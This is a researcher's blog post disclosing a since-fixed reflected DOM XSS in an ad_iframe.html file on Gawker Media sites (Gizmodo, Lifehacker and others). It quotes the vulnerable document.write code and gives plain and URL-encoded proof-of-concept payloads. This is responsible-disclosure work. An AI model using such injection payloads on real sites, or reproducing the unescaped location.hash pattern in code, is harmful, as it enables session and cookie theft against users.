Friday, September 6, 2013

Gizmodo, Lifehacker, Gawker - reflected DOM XSS

I'm a big follower of many of Gawker Media websites - like Lifehacker and Gizmodo - and with that in mind I try to help them on their security level.

Just cruising along in Gizmodo website I found a problem that caught my attention.
A request to a file called ad_iframe.html on assets directory. Checking the source code of that file I found:
<script>
var location_parts = window.location.hash.substring(1).split('|');
var rand = location_parts[0];
var scriptsrc = decodeURIComponent(location_parts[1]);
document.write("<scr"+"ipt src='" + scriptsrc + "'></scr"+"ipt>");
</script>
The variable scriptsrc isn't properly escaped from the source location.hash.
Just giving the expected hashtag and pipe chars, a user could exploit this vulnerability with a DOM XSS to achieve information.

How can this be exploited?

Proof-of-concept on Gizmodo:
http://gizmodo.com/assets/ad_iframe.html#|'></script><script>alert("xss by @dsopas");</script><div x='
Proof-of-concept on Gizmodo (encoded):
http://gizmodo.com/assets/ad_iframe.html#|'>%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%20%62%79%20%40%64%73%6F%70%61%73%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%78%3D%27


A malicious user could also:

  • access other sites inside another client's private intranet.
  • steal another client's cookie(s).
  • modify another client's cookie(s).
  • steal another client's submitted form data.
  • modify another client's submitted form data (before it reaches the server).
  • submit a form to your application on the user's behalf which modifies passwords or other application data

This DOM XSS vulnerability was present in many Gawker Media websites:
http://gawker.com/assets/ad_iframe.html
http://gizmodo.com/assets/ad_iframe.html
http://lifehacker.com/assets/ad_iframe.html
http://deadspin.com/assets/ad_iframe.html
http://io9.com/assets/ad_iframe.html
http://jalopnik.com/assets/ad_iframe.html
http://jezebel.com/assets/ad_iframe.html
http://kotaku.com/assets/ad_iframe.html
I want to thank Gawker Media tech team for fixing this issue in less than 24 hours. They really care about security and their users.

Timeline:
02 Set 2013: Reported to Gawker Media
03 Set 2013: Gawker Media replied that a fix has been deployed
06 Set 2013: Full disclosure

No comments:

Post a Comment